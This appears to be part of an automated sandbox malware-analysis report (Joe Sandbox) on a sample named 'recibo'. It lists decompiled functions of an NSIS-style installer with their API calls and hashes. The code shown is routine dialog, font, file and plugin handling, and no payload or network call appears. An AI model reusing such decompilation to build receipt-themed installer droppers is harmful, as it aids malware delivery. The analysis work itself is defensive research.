                                                                                  				int _t11;
                                                                                  				int _t20;
                                                                                  
                                                                                  				if(_a8 == 0x110) {
                                                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                                                  					_a8 = 0x113;
                                                                                  				}
                                                                                  				if(_a8 == 0x113) {
                                                                                  					_t20 =  *0x41ea18; // 0x94236
                                                                                  					_t11 =  *0x42aa24; // 0x9423a
                                                                                  					if(_t20 >= _t11) {
                                                                                  						_t20 = _t11;
                                                                                  					}
                                                                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                  					SetWindowTextW(_a4,  &_v132);
                                                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}







                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                  • MulDiv.KERNEL32(00094236,00000064,0009423A), ref: 00402FDC
                                                                                  • wsprintfW.USER32 ref: 00402FEC
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: 6B$:B$verifying installer: %d%%
                                                                                  • API String ID: 1451636040-3956744998
                                                                                  • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                  • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                  • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                  • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                  				struct tagLOGBRUSH _v16;
                                                                                  				long _t39;
                                                                                  				long _t41;
                                                                                  				void* _t44;
                                                                                  				signed char _t50;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				if(_a4 + 0xfffffecd > 5) {
                                                                                  					L18:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                  					goto L18;
                                                                                  				} else {
                                                                                  					_t50 = _t54[5];
                                                                                  					if((_t50 & 0xffffffe0) != 0) {
                                                                                  						goto L18;
                                                                                  					}
                                                                                  					_t39 =  *_t54;
                                                                                  					if((_t50 & 0x00000002) != 0) {
                                                                                  						_t39 = GetSysColor(_t39);
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000001) != 0) {
                                                                                  						SetTextColor(_a8, _t39);
                                                                                  					}
                                                                                  					SetBkMode(_a8, _t54[4]);
                                                                                  					_t41 = _t54[1];
                                                                                  					_v16.lbColor = _t41;
                                                                                  					if((_t54[5] & 0x00000008) != 0) {
                                                                                  						_t41 = GetSysColor(_t41);
                                                                                  						_v16.lbColor = _t41;
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000004) != 0) {
                                                                                  						SetBkColor(_a8, _t41);
                                                                                  					}
                                                                                  					if((_t54[5] & 0x00000010) != 0) {
                                                                                  						_v16.lbStyle = _t54[2];
                                                                                  						_t44 = _t54[3];
                                                                                  						if(_t44 != 0) {
                                                                                  							DeleteObject(_t44);
                                                                                  						}
                                                                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                  					}
                                                                                  					return _t54[3];
                                                                                  				}
                                                                                  			}










                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                  • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                  • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                  • GetSysColor.USER32(?), ref: 00404586
                                                                                  • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                  • DeleteObject.GDI32(?), ref: 004045B0
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                  • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E004067C4(WCHAR* _a4) {
                                                                                  				short _t5;
                                                                                  				short _t7;
                                                                                  				WCHAR* _t19;
                                                                                  				WCHAR* _t20;
                                                                                  				WCHAR* _t21;
                                                                                  
                                                                                  				_t20 = _a4;
                                                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                  					_t20 =  &(_t20[4]);
                                                                                  				}
                                                                                  				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                                  					_t20 =  &(_t20[2]);
                                                                                  				}
                                                                                  				_t5 =  *_t20;
                                                                                  				_t21 = _t20;
                                                                                  				_t19 = _t20;
                                                                                  				if(_t5 != 0) {
                                                                                  					do {
                                                                                  						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                                  							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                  							_t19 = CharNextW(_t19);
                                                                                  						}
                                                                                  						_t20 = CharNextW(_t20);
                                                                                  						_t5 =  *_t20;
                                                                                  					} while (_t5 != 0);
                                                                                  				}
                                                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                                                  				while(1) {
                                                                                  					_push(_t19);
                                                                                  					_push(_t21);
                                                                                  					_t19 = CharPrevW();
                                                                                  					_t7 =  *_t19;
                                                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                  						break;
                                                                                  					}
                                                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                                                  					if(_t21 < _t19) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}









                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                  • CharNextW.USER32(?,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                  • CharPrevW.USER32(?,?,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 589700163-2977677972
                                                                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                  • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                  • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                                  				long _v8;
                                                                                  				signed char _v12;
                                                                                  				unsigned int _v16;
                                                                                  				void* _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				long _v56;
                                                                                  				void* _v60;
                                                                                  				long _t15;
                                                                                  				unsigned int _t19;
                                                                                  				signed int _t25;
                                                                                  				struct HWND__* _t28;
                                                                                  
                                                                                  				_t28 = _a4;
                                                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                  				if(_a8 == 0) {
                                                                                  					L4:
                                                                                  					_v56 = _t15;
                                                                                  					_v60 = 4;
                                                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                  					return _v24;
                                                                                  				}
                                                                                  				_t19 = GetMessagePos();
                                                                                  				_v16 = _t19 >> 0x10;
                                                                                  				_v20 = _t19;
                                                                                  				ScreenToClient(_t28,  &_v20);
                                                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                  				if((_v12 & 0x00000066) != 0) {
                                                                                  					_t15 = _v8;
                                                                                  					goto L4;
                                                                                  				}
                                                                                  				return _t25 | 0xffffffff;
                                                                                  			}















                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                  • GetMessagePos.USER32 ref: 00404E77
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 73%
                                                                                  			E00401E4E(intOrPtr __edx) {
                                                                                  				void* __edi;
                                                                                  				int _t9;
                                                                                  				signed char _t15;
                                                                                  				struct HFONT__* _t18;
                                                                                  				intOrPtr _t30;
                                                                                  				void* _t31;
                                                                                  				struct HDC__* _t33;
                                                                                  				void* _t35;
                                                                                  
                                                                                  				_t30 = __edx;
                                                                                  				_t33 = GetDC( *(_t35 - 8));
                                                                                  				_t9 = E00402D84(2);
                                                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                  				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                                  				ReleaseDC( *(_t35 - 8), _t33);
                                                                                  				 *0x40ce00 = E00402D84(3);
                                                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                                  				 *0x40ce07 = 1;
                                                                                  				 *0x40ce04 = _t15 & 0x00000001;
                                                                                  				 *0x40ce05 = _t15 & 0x00000002;
                                                                                  				 *0x40ce06 = _t15 & 0x00000004;
                                                                                  				E0040657A(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
                                                                                  				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                                  				_push(_t18);
                                                                                  				_push(_t31);
                                                                                  				E00406484();
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                  				return 0;
                                                                                  			}












                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                  • String ID: Times New Roman
                                                                                  • API String ID: 2584051700-927190056
                                                                                  • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                  • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                  • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                  • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E71542655() {
                                                                                  				intOrPtr _t24;
                                                                                  				void* _t26;
                                                                                  				intOrPtr _t27;
                                                                                  				signed int _t39;
                                                                                  				void* _t40;
                                                                                  				void* _t43;
                                                                                  				intOrPtr _t44;
                                                                                  				void* _t45;
                                                                                  
                                                                                  				_t40 = E715412BB();
                                                                                  				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                  				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                  				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                  				do {
                                                                                  					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                  					}
                                                                                  					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                  					if(_t39 <= 7) {
                                                                                  						switch( *((intOrPtr*)(_t39 * 4 +  &M71542784))) {
                                                                                  							case 0:
                                                                                  								 *_t40 = 0;
                                                                                  								goto L17;
                                                                                  							case 1:
                                                                                  								__eax =  *__eax;
                                                                                  								if(__ecx > __ebx) {
                                                                                  									 *(__esp + 0x10) = __ecx;
                                                                                  									__ecx =  *(0x7154407c + __edx * 4);
                                                                                  									__edx =  *(__esp + 0x10);
                                                                                  									__ecx = __ecx * __edx;
                                                                                  									asm("sbb edx, edx");
                                                                                  									__edx = __edx & __ecx;
                                                                                  									__eax = __eax &  *(0x7154409c + __edx * 4);
                                                                                  								}
                                                                                  								_push(__eax);
                                                                                  								goto L15;
                                                                                  							case 2:
                                                                                  								__eax = E71541510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                  								goto L16;
                                                                                  							case 3:
                                                                                  								__ecx =  *0x7154506c;
                                                                                  								__edx = __ecx - 1;
                                                                                  								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                  								__eax =  *0x7154506c;
                                                                                  								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                  								goto L17;
                                                                                  							case 4:
                                                                                  								__eax = lstrcpynW(__edi,  *__eax,  *0x7154506c);
                                                                                  								goto L17;
                                                                                  							case 5:
                                                                                  								_push( *0x7154506c);
                                                                                  								_push(__edi);
                                                                                  								_push( *__eax);
                                                                                  								__imp__StringFromGUID2();
                                                                                  								goto L17;
                                                                                  							case 6:
                                                                                  								_push( *__esi);
                                                                                  								L15:
                                                                                  								__eax = wsprintfW(__edi, 0x71545000);
                                                                                  								L16:
                                                                                  								__esp = __esp + 0xc;
                                                                                  								goto L17;
                                                                                  						}
                                                                                  					}
                                                                                  					L17:
                                                                                  					_t26 =  *(_t43 + 0x14);
                                                                                  					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                  						GlobalFree(_t26);
                                                                                  					}
                                                                                  					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                  					if(_t27 != 0) {
                                                                                  						if(_t27 != 0xffffffff) {
                                                                                  							if(_t27 > 0) {
                                                                                  								E71541381(_t27 - 1, _t40);
                                                                                  								goto L26;
                                                                                  							}
                                                                                  						} else {
                                                                                  							E71541312(_t40);
                                                                                  							L26:
                                                                                  						}
                                                                                  					}
                                                                                  					_t44 = _t44 - 1;
                                                                                  					_t43 = _t43 - 0x20;
                                                                                  				} while (_t44 >= 0);
                                                                                  				return GlobalFree(_t40);
                                                                                  			}












                                                                                  APIs
                                                                                    • Part of subcall function 715412BB: GlobalAlloc.KERNEL32(00000040,?,715412DB,?,7154137F,00000019,715411CA,-000000A0), ref: 715412C5
                                                                                  • GlobalFree.KERNEL32(?), ref: 71542743
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71542778
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: c47ff356aa54df237ad5b2b406489fb9b4c39e09d63e8cc3dab9eb6b90c67b75
                                                                                  • Instruction ID: ffead5a842b6660cd981f45b822e36e2367bb695414f3bcfdf66d0c07ccb7025
                                                                                  • Opcode Fuzzy Hash: c47ff356aa54df237ad5b2b406489fb9b4c39e09d63e8cc3dab9eb6b90c67b75
                                                                                  • Instruction Fuzzy Hash: 4531FE72208112EFC71FDF66E9C4D2E7BB6FB85300321A529FD1687260DB3068189B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E00402950(int __ebx, void* __eflags) {
                                                                                  				WCHAR* _t26;
                                                                                  				void* _t29;
                                                                                  				long _t37;
                                                                                  				int _t49;
                                                                                  				void* _t52;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t59;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t49 = __ebx;
                                                                                  				_t52 = 0xfffffd66;
                                                                                  				_t26 = E00402DA6(0xfffffff0);
                                                                                  				_t55 = _t26;
                                                                                  				 *(_t61 - 0x40) = _t26;
                                                                                  				if(E00405E83(_t26) == 0) {
                                                                                  					E00402DA6(0xffffffed);
                                                                                  				}
                                                                                  				E00406008(_t55);
                                                                                  				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                                  				 *(_t61 + 8) = _t29;
                                                                                  				if(_t29 != 0xffffffff) {
                                                                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                  					if( *(_t61 - 0x28) != _t49) {
                                                                                  						_t37 =  *0x434f14;
                                                                                  						 *(_t61 - 0x44) = _t37;
                                                                                  						_t54 = GlobalAlloc(0x40, _t37);
                                                                                  						if(_t54 != _t49) {
                                                                                  							E004034E5(_t49);
                                                                                  							E004034CF(_t54,  *(_t61 - 0x44));
                                                                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                  							 *(_t61 - 0x10) = _t59;
                                                                                  							if(_t59 != _t49) {
                                                                                  								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                  								while( *_t59 != _t49) {
                                                                                  									_t60 = _t59 + 8;
                                                                                  									 *(_t61 - 0x3c) =  *_t59;
                                                                                  									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                  								}
                                                                                  								GlobalFree( *(_t61 - 0x10));
                                                                                  							}
                                                                                  							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                  							GlobalFree(_t54);
                                                                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                  						}
                                                                                  					}
                                                                                  					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                  					CloseHandle( *(_t61 + 8));
                                                                                  				}
                                                                                  				_t56 = 0xfffffff3;
                                                                                  				if(_t52 < _t49) {
                                                                                  					_t56 = 0xffffffef;
                                                                                  					DeleteFileW( *(_t61 - 0x40));
                                                                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                  				}
                                                                                  				_push(_t56);
                                                                                  				E00401423();
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                                  				return 0;
                                                                                  			}














                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                  • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2667972263-0
                                                                                  • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                  • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                  • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                  • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 85%
                                                                                  			E71542480(void* __edx) {
                                                                                  				void* _t37;
                                                                                  				signed int _t38;
                                                                                  				void* _t39;
                                                                                  				void* _t41;
                                                                                  				signed char* _t42;
                                                                                  				signed char* _t51;
                                                                                  				void* _t52;
                                                                                  				void* _t54;
                                                                                  
                                                                                  				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                  				while(1) {
                                                                                  					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                  					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                  					_t52 = _t51[0x18];
                                                                                  					if(_t52 == 0) {
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					_t41 = 0x1a;
                                                                                  					if(_t52 == _t41) {
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					if(_t52 != 0xffffffff) {
                                                                                  						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                  							_t51[0x18] = _t41;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t37 = E7154135A(_t52 - 1);
                                                                                  							L10:
                                                                                  							goto L11;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_t37 = E715412E3();
                                                                                  						L11:
                                                                                  						_t52 = _t37;
                                                                                  						L12:
                                                                                  						_t13 =  &(_t51[8]); // 0x1020
                                                                                  						_t42 = _t13;
                                                                                  						if(_t51[4] >= 0) {
                                                                                  						}
                                                                                  						_t38 =  *_t51 & 0x000000ff;
                                                                                  						_t51[0x1c] = 0;
                                                                                  						if(_t38 > 7) {
                                                                                  							L27:
                                                                                  							_t39 = GlobalFree(_t52);
                                                                                  							if( *(_t54 + 0x10) == 0) {
                                                                                  								return _t39;
                                                                                  							}
                                                                                  							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                  							} else {
                                                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                  							}
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							switch( *((intOrPtr*)(_t38 * 4 +  &M715425F8))) {
                                                                                  								case 0:
                                                                                  									 *_t42 = 0;
                                                                                  									goto L27;
                                                                                  								case 1:
                                                                                  									__eax = E715413B1(__ebp);
                                                                                  									goto L21;
                                                                                  								case 2:
                                                                                  									 *__edi = E715413B1(__ebp);
